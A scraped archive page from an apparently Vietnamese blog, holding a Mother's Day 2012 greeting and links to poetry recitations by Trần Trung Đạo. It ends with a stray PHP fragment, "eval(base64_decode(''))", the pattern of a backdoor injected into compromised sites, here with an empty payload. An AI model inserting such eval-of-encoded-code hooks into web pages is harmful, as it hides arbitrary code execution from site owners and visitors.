Archive for May 9th, 2012

[Happy Mother's Day 2012]  Ðổi Cả Thiên Thu Tiếng Mẹ Cười

[Happy Mother’s Day 2012] Ðổi Cả Thiên Thu Tiếng Mẹ Cười

Kính chúc độc giả và thân hữu Ngày Hiền Mẫu 2012 bình an, hạnh phúc trong tình thương của mẹ, dù mẹ còn hay đã đ xa. [flashvideo file=http://www.youtube.com/watch?v=9Oa5pMaWx_c /] Trần Trung Đạo ngâm thơ [flashvideo file=http://www.youtube.com/watc

05.9.2012 | Thơ |

11 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>